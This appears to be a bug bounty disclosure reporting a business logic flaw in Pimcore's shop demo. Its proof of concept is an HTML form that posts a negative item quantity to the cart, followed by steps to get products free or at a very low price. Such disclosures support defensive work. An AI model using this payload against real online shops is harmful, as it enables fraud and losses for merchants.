Business Logic Errors in pimcore/pimcore
Reported on
Jul 24th 2021
โ๏ธ Description
Pimcore
is vulnerable to Business Logic error through negative products amount.
๐ต๏ธโโ๏ธ Proof of Concept
HTML content:
<form id="form" action="https://demo.pimcore.fun/en/cart" method="POST">
<input name="items[12]" value="1">
<input name="items[440]" value="-69">
<input type="submit">
</form>
- Save the above content into an HTML file.
- Open the HTML file on the browser and click on
Submit
button. - Check out the total price.
๐ฅ Impact
It is possible to get all products for free or with a very low price.
Occurrences
@admin how can I signup as the maintainer of a project?
Hey Bernhard, you should have access now. You will also automatically have access to all future pimcore disclosures. Do let me know if you encounter any further issues viewing the details of this report.